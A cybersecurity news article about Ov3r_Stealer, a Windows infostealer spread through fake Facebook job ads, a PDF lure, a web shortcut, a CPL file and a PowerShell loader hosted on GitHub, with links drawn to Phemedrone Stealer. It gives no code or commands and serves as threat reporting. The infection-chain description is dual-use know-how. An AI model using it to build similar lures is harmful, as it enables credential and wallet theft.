False Facebook job postings are being used by threat actors as an enticement to fool potential victims into downloading a new stealer malware for Windows known as Ov3r_Stealer.
According to a research provided with The Hacker News by Trustwave SpiderLabs, "this malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors."
Ov3r_Stealer can extract information on the compromised host's hardware, passwords, credit card details, auto-fills, browser extensions, cryptocurrency wallets, Microsoft Office documents, and antivirus software installed.
Although the campaign's precise objective is unknown, it's likely that other threat actors are given the stolen data for sale. Another possibility is that Ov3r_Stealer will eventually be altered to function as a loader for extra payloads, such as ransomware, similar to QakBot.
The assault begins with a malicious PDF file that seems to be housed on OneDrive and invites users to click on an embedded "Access Document" button.
According to Trustwave, it discovered that the PDF file was being distributed via Facebook advertisements for digital advertising opportunities and on a phoney account purporting to be that of Amazon CEO Andy Jassy.
When a user clicks the button, a file known as a web shortcut (.URL) is sent to them, seeming to be a DocuSign document stored on Discord's content delivery network (CDN). The Windows Control Panel process binary ("control.exe") is then used to run the control panel item (.CPL) file that is delivered via the shortcut file.
When the CPL file is run, a PowerShell loader ("DATA1.txt") is downloaded from a GitHub repository, which is what finally launches Ov3r_Stealer.
Facebook Job Postings
At this point, it's important to note that Trend Micro recently revealed that threat actors were using a nearly identical infection chain to drop another stealer, known as Phemedrone Stealer, by taking advantage of a Microsoft Windows Defender SmartScreen bypass vulnerability (CVE-2023-36025, CVSS score: 8.8).
The GitHub repository that is used (nateeintanan2527) and the code-level overlaps between Ov3r_Stealer and Phemedrone are also comparable.
"This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r_Stealer," warned Trustwave. "The main difference between the two is that Phemedrone is written in C#."
The results coincide with Hudson Rock's revelation that threat actors are using credentials stolen via infostealer infections to advertise their access to law enforcement request portals of significant companies including Google, TikTok, Binance, and Meta.
They also coincide with the appearance of a class of infections known as CrackedCantil, which use compromised software as a first point of entry for drop loaders such as PrivateLoader and SmokeLoader. These drop loaders then serve as a vehicle for the distribution of ransomware, crypto miners, information thieves, and proxy botnets.
Comments